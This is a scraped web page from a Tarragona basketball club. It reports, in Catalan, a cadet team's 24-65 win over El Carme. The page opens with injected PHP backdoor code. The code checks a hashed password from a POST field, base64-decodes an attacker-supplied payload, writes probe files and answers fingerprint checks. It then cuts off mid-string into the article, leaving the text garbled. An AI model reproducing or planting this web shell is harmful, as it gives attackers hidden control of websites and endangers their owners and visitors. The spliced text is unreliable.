function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí 03 fa una defensa excel·lent en el segon quart i derrota El Carme (24-65) - Tgn Bàsquet Club -

El cadet masculí 03 fa una defensa excel·lent en el segon quart i derrota El Carme (24-65)

Updated: octubre 24, 2017

El cadet masculí 03 va guanyar amb claredat El Carme a domicili en un partit que va sentenciar en el segon període. Després d’un inici amb alguns dubtes i errades, el TGN Bàsquet va fer una defensa impressionant en el segon quart que va deixar a zero el seu rival. El Carme es va mostrar impotent contra la intensitat defensiva visitant i amb prou feines podia passar el mig camp. El parcial d’aquest segon període és molt clarificador: 0-28. Amb un marcador de 12-40 s’arribava al descans i el matx estava sentenciat. La segona meitat va ser pràcticament un tràmit.